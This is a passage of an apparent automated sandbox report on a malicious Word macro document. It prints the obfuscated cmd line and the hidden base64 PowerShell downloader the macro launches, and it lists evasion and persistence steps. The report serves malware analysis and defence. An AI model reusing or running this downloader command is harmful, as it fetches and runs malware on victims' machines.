                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ynnlsbotf\dxdmxwxi.pod',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                      Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2327289380.0000000002B07000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2327289380.0000000002B07000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2327289380.0000000002B07000.00000004.00000040.sdmp
                      Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2327289380.0000000002B07000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2327289380.0000000002B07000.00000004.00000040.sdmp
                      Source: Binary string: System.pdb source: powershell.exe, 00000005.00000002.2327289380.0000000002B07000.00000004.00000040.sdmp
                      Source: Binary string: System.pdb8 source: powershell.exe, 00000005.00000002.2327289380.0000000002B07000.00000004.00000040.sdmp
                      Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2327249466.0000000002A60000.00000002.00000001.sdmp
                      Source: Binary string: <ystem.pdb source: powershell.exe, 00000005.00000002.2327289380.0000000002B07000.00000004.00000040.sdmp

                      Data Obfuscation:

                      barindex
                      Document contains an embedded VBA with many GOTO operations indicating source code obfuscationShow sources
                      Source: N00048481397007.docStream path 'Macros/VBA/Gp0t5ucwnkng7fi' : High number of GOTO operations
                      Source: VBA code instrumentationOLE, VBA macro, High number of GOTO operations: Module Gp0t5ucwnkng7fi
                      Obfuscated command line foundShow sources
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAFMAZQBUAC0ASQBUAEUATQAgACAAKAAnAHYAJwArACcAQQBSAGkAYQAnACsAJwBCAGwARQA6AGYAJwArACcANwBEACcAKwAnAEgAJwApACAAIAAoACAAWwBUAFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsANAB9AHsAMQB9AHsAMwB9ACIALQBGACAAJwBTAHQAZQBNAC4AaQBPACcALAAnAGMAdABvACcALAAnAHMAeQAnACwAJwByAHkAJwAsACcALgBkAGkAcgBlACcAKQApACAAIAA7ACAAcwBFAHQALQBJAHQARQBNACAAVgBhAFIAaQBBAEIATABlADoAUwBnADIAeABVACAAKAAgACAAWwBUAHkAUABlAF0AKAAiAHsANwB9AHsANAB9AHsANQB9AHsAMQB9AHsAOAB9AHsAMgB9AHsAMAB9AHsANgB9AHsAMwB9ACIALQBGACcAQQBuAEEAZwAnACwAJwBDAEUAUABvAEkAbgAnACwAJwBNACcALAAnAFIAJwAsACcAVABFAG0ALgBOAGUAdAAuAFMARQByACcALAAnAHYASQAnACwAJwBFACcALAAnAFMAWQBzACcALAAnAHQAJwApACAAIAApADsAIAAgACQAWgB6ADgAMgBfADQAMgA9ACQAQgAwADMASQAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQASwA3ADgAUwA7ACQATwAwADAARwA9ACgAJwBFAF8AJwArACcANgBaACcAKQA7ACAAIAAkAEYANwBEAEgAOgA6ACIAYwByAEUAQQBgAFQARQBEAEkAYABSAGAAZQBjAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAZwBUAEwAJwArACcAeABiACcAKwAnAGYAJwApACsAJwB5AHYAJwArACcAawAnACsAJwBlAGcAJwArACcAVAAnACsAJwBHAGMAJwArACgAJwBxAHQAJwArACcAcgBfAGYAJwApACsAKAAnAGUAZwAnACsAJwBUACcAKQApAC4AIgByAGUAUABMAGAAQQBDAEUAIgAoACgAWwBDAEgAQQBSAF0AMQAwADEAKwBbAEMASABBAFIAXQAxADAAMwArAFsAQwBIAEEAUgBdADgANAApACwAWwBzAHQAcgBpAG4AZwBdAFsAQwBIAEEAUgBdADkAMgApACkAKQA7ACQAUAA0ADYAVQA9ACgAJwBBACcAKwAoACcANgA1ACcAKwAnAFEAJwApACkAOwAgACAAJABTAEcAMgBYAFUAOgA6ACIAcwBgAEUAQwB1AGAAUgBpAFQAWQBwAHIATwBUAG8AYABjAGAATwBsACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABJAF8ANwBSAD0AKAAnAEQAJwArACgAJwA3ADUAJwArACcARwAnACkAKQA7ACQAWQB6AGoAcQB4AHgAcQAgAD0AIAAoACcAQwA0ACcAKwAnADYAVAAnACkAOwAkAEwAXwBfAFMAPQAoACgAJwBQAF8AJwArACcAXwAnACkAKwAnAEQAJwApADsAJABVAGsAMQB0AHQAMQBfAD0AJABIAE8ATQBFACsAKAAoACcASAAnACsAKAAnAE8AeAAnACsAJwBMAHgAYgBmACcAKQArACcAeQAnACsAJwB2ACcAKwAoACcAawBIAE8AeAAnACsAJwBHAGMAcQAnACkAKwAnAHQAJwArACgAJwByAF8AZgAnACsAJwBIAE8AeAAnACkAKQAuACIAcgBFAHAAbABgAEEAYwBlACIAKAAoACcASABPACcAKwAnAHgAJwApACwAWwBzAHQAUgBJAE4AZwBdAFsAQwBIAGEAUgBdADkAMgApACkAKwAkAFkAegBqAHEAeAB4AHEAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFQANQA1AEwAPQAoACgAJwBZACcAKwAnADIAMQAnACkAKwAnAFEAJwApADsAJABKAGcANAAxAHMAYwB3AD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQATgBpAG8AbwBpADIAcQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgACcAKQArACgAJwBkACcAKwAnAGIAIAAnACkAKwAoACcAbgBkACcAKwAnADoAJwApACsAKAAnAC8ALwAnACsAJwBuAGkAJwApACsAJwBnAGgAJwArACgAJwB0ACcAKwAnAGwAaQBmAGUAbQB1ACcAKwAnAG0AYgAnACkAKwAnAGEAJwArACgAJwBpAC4AJwArACcAYwBsACcAKQArACgAJwB1AGIALwB4ACcAKwAnAC8AMAB3ACcAKwAnAEIAJwApACsAKAAnAEQAMwAnACsAJwAvACEAbgAnACsAJwBzACAAdwAnACkAKwAnAHUAIAAnACsAJwBkACcAKwAnAGIAJwArACgAJwAgAG4AZAAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwAnACsAJwBzAGgAbwAnACkAKwAoACcAcAAuAG4AbwAnACsAJwB3ACcAKQArACcAZgAnACsAKAAnAGEAbAAuAGQAJwArACcAZQAnACkAKwAnAHYAJwArACcALwB3ACcAKwAoACcAcAAtAGkAbgAnACsAJwBjACcAKQArACgAJwBsAHUAJwArACcAZABlACcAKQArACgAJwBzAC8AUgAnACsAJwBsAE0ATwAnACsAJwBiAGYAJwApACsAKAAnADIAagAwACcA
                      Suspicious powershell command line foundShow sources
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAZQBUAC0ASQBUAEUATQAgACAAKAAnAHYAJwArACcAQQBSAGkAYQAnACsAJwBCAGwARQA6AGYAJwArACcANwBEACcAKwAnAEgAJwApACAAIAAoACAAWwBUAFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsANAB9AHsAMQB9AHsAMwB9ACIALQBGACAAJwBTAHQAZQBNAC4AaQBPACcALAAnAGMAdABvACcALAAnAHMAeQAnACwAJwByAHkAJwAsACcALgBkAGkAcgBlACcAKQApACAAIAA7ACAAcwBFAHQALQBJAHQARQBNACAAVgBhAFIAaQBBAEIATABlADoAUwBnADIAeABVACAAKAAgACAAWwBUAHkAUABlAF0AKAAiAHsANwB9AHsANAB9AHsANQB9AHsAMQB9AHsAOAB9AHsAMgB9AHsAMAB9AHsANgB9AHsAMwB9ACIALQBGACcAQQBuAEEAZwAnACwAJwBDAEUAUABvAEkAbgAnACwAJwBNACcALAAnAFIAJwAsACcAVABFAG0ALgBOAGUAdAAuAFMARQByACcALAAnAHYASQAnACwAJwBFACcALAAnAFMAWQBzACcALAAnAHQAJwApACAAIAApADsAIAAgACQAWgB6ADgAMgBfADQAMgA9ACQAQgAwADMASQAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQASwA3ADgAUwA7ACQATwAwADAARwA9ACgAJwBFAF8AJwArACcANgBaACcAKQA7ACAAIAAkAEYANwBEAEgAOgA6ACIAYwByAEUAQQBgAFQARQBEAEkAYABSAGAAZQBjAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAZwBUAEwAJwArACcAeABiACcAKwAnAGYAJwApACsAJwB5AHYAJwArACcAawAnACsAJwBlAGcAJwArACcAVAAnACsAJwBHAGMAJwArACgAJwBxAHQAJwArACcAcgBfAGYAJwApACsAKAAnAGUAZwAnACsAJwBUACcAKQApAC4AIgByAGUAUABMAGAAQQBDAEUAIgAoACgAWwBDAEgAQQBSAF0AMQAwADEAKwBbAEMASABBAFIAXQAxADAAMwArAFsAQwBIAEEAUgBdADgANAApACwAWwBzAHQAcgBpAG4AZwBdAFsAQwBIAEEAUgBdADkAMgApACkAKQA7ACQAUAA0ADYAVQA9ACgAJwBBACcAKwAoACcANgA1ACcAKwAnAFEAJwApACkAOwAgACAAJABTAEcAMgBYAFUAOgA6ACIAcwBgAEUAQwB1AGAAUgBpAFQAWQBwAHIATwBUAG8AYABjAGAATwBsACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABJAF8ANwBSAD0AKAAnAEQAJwArACgAJwA3ADUAJwArACcARwAnACkAKQA7ACQAWQB6AGoAcQB4AHgAcQAgAD0AIAAoACcAQwA0ACcAKwAnADYAVAAnACkAOwAkAEwAXwBfAFMAPQAoACgAJwBQAF8AJwArACcAXwAnACkAKwAnAEQAJwApADsAJABVAGsAMQB0AHQAMQBfAD0AJABIAE8ATQBFACsAKAAoACcASAAnACsAKAAnAE8AeAAnACsAJwBMAHgAYgBmACcAKQArACcAeQAnACsAJwB2ACcAKwAoACcAawBIAE8AeAAnACsAJwBHAGMAcQAnACkAKwAnAHQAJwArACgAJwByAF8AZgAnACsAJwBIAE8AeAAnACkAKQAuACIAcgBFAHAAbABgAEEAYwBlACIAKAAoACcASABPACcAKwAnAHgAJwApACwAWwBzAHQAUgBJAE4AZwBdAFsAQwBIAGEAUgBdADkAMgApACkAKwAkAFkAegBqAHEAeAB4AHEAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFQANQA1AEwAPQAoACgAJwBZACcAKwAnADIAMQAnACkAKwAnAFEAJwApADsAJABKAGcANAAxAHMAYwB3AD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQATgBpAG8AbwBpADIAcQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgACcAKQArACgAJwBkACcAKwAnAGIAIAAnACkAKwAoACcAbgBkACcAKwAnADoAJwApACsAKAAnAC8ALwAnACsAJwBuAGkAJwApACsAJwBnAGgAJwArACgAJwB0ACcAKwAnAGwAaQBmAGUAbQB1ACcAKwAnAG0AYgAnACkAKwAnAGEAJwArACgAJwBpAC4AJwArACcAYwBsACcAKQArACgAJwB1AGIALwB4ACcAKwAnAC8AMAB3ACcAKwAnAEIAJwApACsAKAAnAEQAMwAnACsAJwAvACEAbgAnACsAJwBzACAAdwAnACkAKwAnAHUAIAAnACsAJwBkACcAKwAnAGIAJwArACgAJwAgAG4AZAAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwAnACsAJwBzAGgAbwAnACkAKwAoACcAcAAuAG4AbwAnACsAJwB3ACcAKQArACcAZgAnACsAKAAnAGEAbAAuAGQAJwArACcAZQAnACkAKwAnAHYAJwArACcALwB3ACcAKwAoACcAcAAtAGkAbgAnACsAJwBjACcAKQArACgAJwBsAHUAJwArACcAZABlACcAKQArACgAJwBzAC8AUgAnACsAJwBsAE0ATwAnACsAJwBiAGYAJwApACsAKAAnADIAagAwACcAKwAnAC8AIQBuAHMAIAB3ACcAKwAnAHUAJwApACsAKAAnACAAJwArACcAZABiACAAJwArAC
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAZQBUAC0ASQBUAEUATQAgACAAKAAnAHYAJwArACcAQQBSAGkAYQAnACsAJwBCAGwARQA6AGYAJwArACcANwBEACcAKwAnAEgAJwApACAAIAAoACAAWwBUAFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsANAB9AHsAMQB9AHsAMwB9ACIALQBGACAAJwBTAHQAZQBNAC4AaQBPACcALAAnAGMAdABvACcALAAnAHMAeQAnACwAJwByAHkAJwAsACcALgBkAGkAcgBlACcAKQApACAAIAA7ACAAcwBFAHQALQBJAHQARQBNACAAVgBhAFIAaQBBAEIATABlADoAUwBnADIAeABVACAAKAAgACAAWwBUAHkAUABlAF0AKAAiAHsANwB9AHsANAB9AHsANQB9AHsAMQB9AHsAOAB9AHsAMgB9AHsAMAB9AHsANgB9AHsAMwB9ACIALQBGACcAQQBuAEEAZwAnACwAJwBDAEUAUABvAEkAbgAnACwAJwBNACcALAAnAFIAJwAsACcAVABFAG0ALgBOAGUAdAAuAFMARQByACcALAAnAHYASQAnACwAJwBFACcALAAnAFMAWQBzACcALAAnAHQAJwApACAAIAApADsAIAAgACQAWgB6ADgAMgBfADQAMgA9ACQAQgAwADMASQAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQASwA3ADgAUwA7ACQATwAwADAARwA9ACgAJwBFAF8AJwArACcANgBaACcAKQA7ACAAIAAkAEYANwBEAEgAOgA6ACIAYwByAEUAQQBgAFQARQBEAEkAYABSAGAAZQBjAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAZwBUAEwAJwArACcAeABiACcAKwAnAGYAJwApACsAJwB5AHYAJwArACcAawAnACsAJwBlAGcAJwArACcAVAAnACsAJwBHAGMAJwArACgAJwBxAHQAJwArACcAcgBfAGYAJwApACsAKAAnAGUAZwAnACsAJwBUACcAKQApAC4AIgByAGUAUABMAGAAQQBDAEUAIgAoACgAWwBDAEgAQQBSAF0AMQAwADEAKwBbAEMASABBAFIAXQAxADAAMwArAFsAQwBIAEEAUgBdADgANAApACwAWwBzAHQAcgBpAG4AZwBdAFsAQwBIAEEAUgBdADkAMgApACkAKQA7ACQAUAA0ADYAVQA9ACgAJwBBACcAKwAoACcANgA1ACcAKwAnAFEAJwApACkAOwAgACAAJABTAEcAMgBYAFUAOgA6ACIAcwBgAEUAQwB1AGAAUgBpAFQAWQBwAHIATwBUAG8AYABjAGAATwBsACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABJAF8ANwBSAD0AKAAnAEQAJwArACgAJwA3ADUAJwArACcARwAnACkAKQA7ACQAWQB6AGoAcQB4AHgAcQAgAD0AIAAoACcAQwA0ACcAKwAnADYAVAAnACkAOwAkAEwAXwBfAFMAPQAoACgAJwBQAF8AJwArACcAXwAnACkAKwAnAEQAJwApADsAJABVAGsAMQB0AHQAMQBfAD0AJABIAE8ATQBFACsAKAAoACcASAAnACsAKAAnAE8AeAAnACsAJwBMAHgAYgBmACcAKQArACcAeQAnACsAJwB2ACcAKwAoACcAawBIAE8AeAAnACsAJwBHAGMAcQAnACkAKwAnAHQAJwArACgAJwByAF8AZgAnACsAJwBIAE8AeAAnACkAKQAuACIAcgBFAHAAbABgAEEAYwBlACIAKAAoACcASABPACcAKwAnAHgAJwApACwAWwBzAHQAUgBJAE4AZwBdAFsAQwBIAGEAUgBdADkAMgApACkAKwAkAFkAegBqAHEAeAB4AHEAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFQANQA1AEwAPQAoACgAJwBZACcAKwAnADIAMQAnACkAKwAnAFEAJwApADsAJABKAGcANAAxAHMAYwB3AD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQATgBpAG8AbwBpADIAcQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgACcAKQArACgAJwBkACcAKwAnAGIAIAAnACkAKwAoACcAbgBkACcAKwAnADoAJwApACsAKAAnAC8ALwAnACsAJwBuAGkAJwApACsAJwBnAGgAJwArACgAJwB0ACcAKwAnAGwAaQBmAGUAbQB1ACcAKwAnAG0AYgAnACkAKwAnAGEAJwArACgAJwBpAC4AJwArACcAYwBsACcAKQArACgAJwB1AGIALwB4ACcAKwAnAC8AMAB3ACcAKwAnAEIAJwApACsAKAAnAEQAMwAnACsAJwAvACEAbgAnACsAJwBzACAAdwAnACkAKwAnAHUAIAAnACsAJwBkACcAKwAnAGIAJwArACgAJwAgAG4AZAAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwAnACsAJwBzAGgAbwAnACkAKwAoACcAcAAuAG4AbwAnACsAJwB3ACcAKQArACcAZgAnACsAKAAnAGEAbAAuAGQAJwArACcAZQAnACkAKwAnAHYAJwArACcALwB3ACcAKwAoACcAcAAtAGkAbgAnACsAJwBjACcAKQArACgAJwBsAHUAJwArACcAZABlACcAKQArACgAJwBzAC8AUgAnACsAJwBsAE0ATwAnACsAJwBiAGYAJwApACsAKAAnADIAagAwACcAKwAnAC8AIQBuAHMAIAB3ACcAKwAnAHUAJwApACsAKAAnACAAJwArACcAZABiACAAJwArAC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0043100B push ss; iretd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0018F090 push edx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0017057F push ss; iretd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00482D98 push 00482E25h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00490020 push 00490058h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00484038 push 00484064h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0045A0B4 push 0045A0E0h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0045A0B2 push 0045A0E0h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0045B274 push 0045B2CDh; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0046C34C push 0046C378h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0045E450 push ecx; mov dword ptr [esp], edx
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_004904F4 push 0049055Ch; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00490498 push 004904EFh; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_004905F0 push 0049063Ch; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0048B588 push 0048B5CAh; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00490580 push 004905ACh; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_004905B8 push 004905E4h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00490654 push 00490680h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_004906C4 push 004906F0h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0045D6DC push 0045D751h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0045E6F0 push ecx; mov dword ptr [esp], edx
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0049068C push 004906B8h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0045E696 push ecx; mov dword ptr [esp], edx
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00458748 push 00458774h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0045D754 push 0045D7ADh; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0045E750 push ecx; mov dword ptr [esp], edx
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_004907E4 push 00490827h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00458798 push 004587C4h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_004937A8 push 004937E0h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00493848 push 00493874h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0049086C push 00490898h; ret

                      Persistence and Installation Behavior:

                      barindex
                      Creates processes via WMIShow sources
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\rundll32.exePE file moved: C:\Windows\SysWOW64\Eahqlsuythns\jqbptpobcyu.bhlJump to behavior

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Eahqlsuythns\jqbptpobcyu.bhl:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Xhprrouvvr\jernautsj.lga:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Lajmixobikmt\gjxhkbksotj.zja:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Txroij\ohrhi.kon:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Whtybzptnxj\kaptmaxkac.ztu:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Dzirlcatgln\dntukqrwhf.kiu:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Mxtcfbxykefck\ibcdoyenctts.gsv:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Ynnlsbotf\dxdmxwxi.pod:Zone.Identifier read attributes | delete
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
